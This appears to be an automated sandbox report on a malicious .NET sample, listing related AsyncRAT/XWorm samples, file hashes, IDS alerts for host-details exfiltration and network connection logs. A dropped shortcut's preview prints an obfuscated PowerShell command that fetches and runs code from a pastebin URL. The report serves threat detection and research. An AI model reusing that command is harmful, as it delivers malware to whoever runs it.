  Lm9IJ4r9oO.exe | malicious | Unknown | 185.199.111.133
  cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 185.199.111.133
  OSLdZanXNc.exe | malicious | Unknown | 185.199.109.133
Context: JA3 client fingerprint seen in other analyses
Match | Associated sample name / URL | Detection | Threat name | Context (IPs)

3b5074b1b5d032e5620f69f9f700ff0e
  VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | 162.159.136.232, 104.20.4.235, 185.199.110.133
  OSLdZanXNc.exe | malicious | Unknown | 162.159.136.232, 104.20.4.235, 185.199.110.133
  5UIy3bo46y.dll | malicious | Unknown | 162.159.136.232, 104.20.4.235, 185.199.110.133
  HQsitBLlOv.dll | malicious | Unknown | 162.159.136.232, 104.20.4.235, 185.199.110.133
  xK44OOt7vD.exe | malicious | Unknown | 162.159.136.232, 104.20.4.235, 185.199.110.133
  steamcodegenerator.exe | malicious | Unknown | 162.159.136.232, 104.20.4.235, 185.199.110.133
  Lm9IJ4r9oO.exe | malicious | Unknown | 162.159.136.232, 104.20.4.235, 185.199.110.133
  gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 162.159.136.232, 104.20.4.235, 185.199.110.133
  cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.136.232, 104.20.4.235, 185.199.110.133
  OSLdZanXNc.exe | malicious | Unknown | 162.159.136.232, 104.20.4.235, 185.199.110.133
                                            No context
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                            Category:dropped
                                            Size (bytes):1728
                                            Entropy (8bit):4.527272298423835
                                            Encrypted:false
                                            SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                            MD5:724AA21828AD912CB466E3B0A79F478B
                                            SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                            SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                            SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                            Malicious:true
                                            Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):11608
                                            Entropy (8bit):4.890472898059848
                                            Encrypted:false
                                            SSDEEP:192:39smG3YrKkDQp5SVsm5emln9smKp5FiMDOmEN3H+OHgFKxoeRH83YrKk7Vsm5emK:cEU/iQ0HzAFGLCib4Sib47VoGIpN6KQc
                                            MD5:66B287A82D897FD706FD1C8A5098E8A5
                                            SHA1:9C5962E1ECA4CFC2D5BC8BA4C6C737F77EC524F8
                                            SHA-256:5009DAAF58FD83E555547764CC1AE0F55B664B4A41AEF5EECB1963C7F6A0C413
                                            SHA-512:5A5713E9F6F1A32E7120838EA5CC4651D1ADA684685D11B6DDEF1CCBD4ED759DAD9D857C36FB2F9B4B6637BCC27ABC3C89BE9428C4CB117817D3F6468DD1DEBB
                                            Malicious:false
                                            Preview:PSMODULECACHE......x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEa
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:Nlllulsl1Z:NllUE
                                            MD5:5B7FE35CFBBB301E5437F19E48F41530
                                            SHA1:2CF5F3FCCE50996EA3DF2F57A7DC84641D2C9D0E
                                            SHA-256:2D35FE48F5EEE9F285CAF3B74BDE21546FBE39AD688684383FD5887F525E58D2
                                            SHA-512:D4F18E23B8A7374574EC4E9ECEB2A4DB4901BD178E41270DC840BC292EBEB6589893B750CF83F62B9CE2AB301EF5CAC35B8C5D8BD9D8FB775F7E6CC289614E3F
                                            Malicious:false
                                            Preview:@...e...............................R.y".............@..........
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Users\user\Desktop\vF20HtY4a4.exe
                                            File Type:ASCII text, with CRLF, LF line terminators
                                            Category:dropped
                                            Size (bytes):199
                                            Entropy (8bit):4.621901208289922
                                            Encrypted:false
                                            SSDEEP:6:l/1KUMFOR8PEpYBYLLELptheFuiBQIBhty:5MF8oEpYBjpLeYIBny
                                            MD5:1E546A14D1D9A4976E6F9872322BC295
                                            SHA1:6548F9F3811B088D64CA3392BBBC404032B63E68
                                            SHA-256:EE7262265283097B23FDE4B00BBB88450E7838C0DBF7EC41B68B0DD642CADFFB
                                            SHA-512:9D71B2D057A7AC6FD39263D04EF4973451DE29FF0B061E12FC9C81AFEC0D9DF7AFC9C01527CC2F3E42257DC72ED947373DB10B28F1ED520E206E3517A4B5E494
                                            Malicious:false
                                            Preview:Usage: Origami.exe <file> <mode> or Origami.exe <file>..Available modes:.-pes: Uses additional PE section for the payload data.-dbg: Uses PE Debug Directory for the payload data..Default mode: -pes..
                                            File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):5.792685453634147
                                            TrID:
                                            • Win64 Executable Console Net Framework (206006/5) 48.58%
                                            • Win64 Executable Console (202006/5) 47.64%
                                            • Win64 Executable (generic) (12005/4) 2.83%
                                            • Generic Win/DOS Executable (2004/3) 0.47%
                                            • DOS Executable Generic (2002/1) 0.47%
                                            File name:vF20HtY4a4.exe
                                            File size:24'064 bytes
                                            MD5:d17a39ca8331a4ce65261b1b6dc7e6ac
                                            SHA1:7972d0341973a0816d2534f187676f9c00dc38c7
                                            SHA256:f06b0c9ae4553b0558c06ecfcb657a9f1d5a42da37caec81ae4a91dd5d03b332
                                            SHA512:eaf6c0af6ebb30b745e89cc4425097611cfaf6516635a2e246b003e4efe5120b755e8358e5134ec0289769361791ebe866e9ccd6268e24a42adcfbd23d785b49
                                            SSDEEP:384:AiSnaFctej9mJ3aN8cmUdxfFujScZCLHABsbQVWyO+CrNCzgSodIyII5/rSKrp2:AiSjej9maN8GdGucubN+iLdIyIkJ2
                                            TLSH:15B21B0063E8CB2AD9FE9F7FB672104406F2F701752AE7481C8C169F5DA7B8412927B6
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.z..........."...0..V............... .....@..... ....................................`...@......@............... .....
                                            Icon Hash:00928e8e8686b000
                                            Entrypoint:0x140000000
                                            Entrypoint Section:
                                            Digitally signed:false
                                            Imagebase:0x140000000
                                            Subsystem:windows cui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0xDE7ACC38 [Mon Apr 12 06:27:04 2088 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:
                                            Instruction
                                            dec ebp
                                            pop edx
                                            nop
                                            add byte ptr [ebx], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax+eax], al
                                            add byte ptr [eax], al
                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8000 | 0x53c | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x7474 | 0x54 | .text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x2000 | 0x557b | 0x5600 | 1dc5ea34b3ebce2db01f3a0796c01cf6 | False | 0.5027707122093024 | data | 5.926880250428821 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc | 0x8000 | 0x53c | 0x600 | 00487c284a2288bcdf1d846d78b7107f | False | 0.3873697916666667 | data | 3.880372350124212 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                            RT_VERSION | 0x8090 | 0x2ac | data | | | 0.4283625730994152
                                            RT_MANIFEST | 0x834c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                            2024-10-15T16:08:33.538671+0200 | 2857658 | ETPRO MALWARE Win32/Fake Robux Bot Registration | 1 | 192.168.2.8 | 49713 | 162.159.136.232 | 443 | TCP
                                            2024-10-15T16:08:45.790087+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.8 | 49718 | 162.159.136.232 | 443 | TCP
                                            2024-10-15T16:08:53.748074+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.8 | 49719 | 162.159.136.232 | 443 | TCP
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Oct 15, 2024 16:08:10.226421118 CEST | 49704 | 80 | 192.168.2.8 | 104.18.111.161
                                            Oct 15, 2024 16:08:10.231345892 CEST | 80 | 49704 | 104.18.111.161 | 192.168.2.8
                                            Oct 15, 2024 16:08:10.231426001 CEST | 49704 | 80 | 192.168.2.8 | 104.18.111.161
                                            Oct 15, 2024 16:08:10.242575884 CEST | 49704 | 80 | 192.168.2.8 | 104.18.111.161
                                            Oct 15, 2024 16:08:10.248711109 CEST | 80 | 49704 | 104.18.111.161 | 192.168.2.8
                                            Oct 15, 2024 16:08:10.915129900 CEST | 80 | 49704 | 104.18.111.161 | 192.168.2.8
                                            Oct 15, 2024 16:08:10.915235996 CEST | 80 | 49704 | 104.18.111.161 | 192.168.2.8
                                            Oct 15, 2024 16:08:10.915283918 CEST | 49704 | 80 | 192.168.2.8 | 104.18.111.161
                                            Oct 15, 2024 16:08:11.061182022 CEST | 49705 | 443 | 192.168.2.8 | 185.199.110.133
                                            Oct 15, 2024 16:08:11.061233997 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:11.061290979 CEST | 49705 | 443 | 192.168.2.8 | 185.199.110.133
                                            Oct 15, 2024 16:08:11.168608904 CEST | 49705 | 443 | 192.168.2.8 | 185.199.110.133
                                            Oct 15, 2024 16:08:11.168662071 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:11.790503025 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:11.790591002 CEST | 49705 | 443 | 192.168.2.8 | 185.199.110.133
                                            Oct 15, 2024 16:08:11.797379017 CEST | 49705 | 443 | 192.168.2.8 | 185.199.110.133
                                            Oct 15, 2024 16:08:11.797401905 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:11.797645092 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:11.848702908 CEST | 49705 | 443 | 192.168.2.8 | 185.199.110.133
                                            Oct 15, 2024 16:08:11.857886076 CEST | 49705 | 443 | 192.168.2.8 | 185.199.110.133
                                            Oct 15, 2024 16:08:11.903403044 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:12.056781054 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:12.056844950 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:12.056871891 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:12.056888103 CEST | 49705 | 443 | 192.168.2.8 | 185.199.110.133
                                            Oct 15, 2024 16:08:12.056910038 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:12.056952953 CEST | 49705 | 443 | 192.168.2.8 | 185.199.110.133
                                            Oct 15, 2024 16:08:12.056961060 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:12.057329893 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:12.057377100 CEST | 49705 | 443 | 192.168.2.8 | 185.199.110.133
                                            Oct 15, 2024 16:08:12.057385921 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:12.064913988 CEST | 443 | 49705 | 185.199.110.133 | 192.168.2.8
                                            Oct 15, 2024 16:08:12.065000057 CEST | 49705 | 443 | 192.168.2.8 | 185.199.110.133
                                            Oct 15, 2024 16:08:12.341115952 CEST | 49705 | 443 | 192.168.2.8 | 185.199.110.133
                                            Oct 15, 2024 16:08:29.644877911 CEST | 49709 | 80 | 192.168.2.8 | 104.20.4.235
                                            Oct 15, 2024 16:08:29.649795055 CEST | 80 | 49709 | 104.20.4.235 | 192.168.2.8
                                            Oct 15, 2024 16:08:29.649872065 CEST | 49709 | 80 | 192.168.2.8 | 104.20.4.235
                                            Oct 15, 2024 16:08:29.686963081 CEST | 49709 | 80 | 192.168.2.8 | 104.20.4.235
                                            Oct 15, 2024 16:08:29.691802979 CEST | 80 | 49709 | 104.20.4.235 | 192.168.2.8
                                            Oct 15, 2024 16:08:30.254349947 CEST | 80 | 49709 | 104.20.4.235 | 192.168.2.8
                                            Oct 15, 2024 16:08:30.256711006 CEST | 49710 | 443 | 192.168.2.8 | 104.20.4.235
                                            Oct 15, 2024 16:08:30.256736040 CEST | 443 | 49710 | 104.20.4.235 | 192.168.2.8
                                            Oct 15, 2024 16:08:30.256819010 CEST | 49710 | 443 | 192.168.2.8 | 104.20.4.235
                                            Oct 15, 2024 16:08:30.261219025 CEST | 49710 | 443 | 192.168.2.8 | 104.20.4.235
                                            Oct 15, 2024 16:08:30.261234045 CEST | 443 | 49710 | 104.20.4.235 | 192.168.2.8
                                            Oct 15, 2024 16:08:30.301785946 CEST | 49709 | 80 | 192.168.2.8 | 104.20.4.235
                                            Oct 15, 2024 16:08:30.891625881 CEST | 443 | 49710 | 104.20.4.235 | 192.168.2.8
                                            Oct 15, 2024 16:08:30.891715050 CEST | 49710 | 443 | 192.168.2.8 | 104.20.4.235
                                            Oct 15, 2024 16:08:30.895194054 CEST | 49710 | 443 | 192.168.2.8 | 104.20.4.235
                                            Oct 15, 2024 16:08:30.895205021 CEST | 443 | 49710 | 104.20.4.235 | 192.168.2.8
                                            Oct 15, 2024 16:08:30.895616055 CEST | 443 | 49710 | 104.20.4.235 | 192.168.2.8
                                            Oct 15, 2024 16:08:30.903321981 CEST | 49710 | 443 | 192.168.2.8 | 104.20.4.235
                                            Oct 15, 2024 16:08:30.947397947 CEST | 443 | 49710 | 104.20.4.235 | 192.168.2.8
                                            Oct 15, 2024 16:08:31.053970098 CEST | 443 | 49710 | 104.20.4.235 | 192.168.2.8
                                            Oct 15, 2024 16:08:31.054091930 CEST | 443 | 49710 | 104.20.4.235 | 192.168.2.8
                                            Oct 15, 2024 16:08:31.054184914 CEST | 49710 | 443 | 192.168.2.8 | 104.20.4.235
                                            Oct 15, 2024 16:08:31.066390038 CEST49710443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:31.080151081 CEST4971180192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.084996939 CEST8049711185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:31.086859941 CEST4971180192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.087018967 CEST4971180192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.091831923 CEST8049711185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:31.690565109 CEST8049711185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:31.690794945 CEST4971180192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.691523075 CEST8049711185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:31.691600084 CEST4971180192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.692914963 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.693015099 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:31.693099976 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.693384886 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.693416119 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:31.695643902 CEST8049711185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.317783117 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.317862034 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.320508003 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.320514917 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.320844889 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.322027922 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.367404938 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.540106058 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.540215969 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.540249109 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.540294886 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.540304899 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.540340900 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.540364027 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.540397882 CEST44349712185.199.110.133192.168.2.8
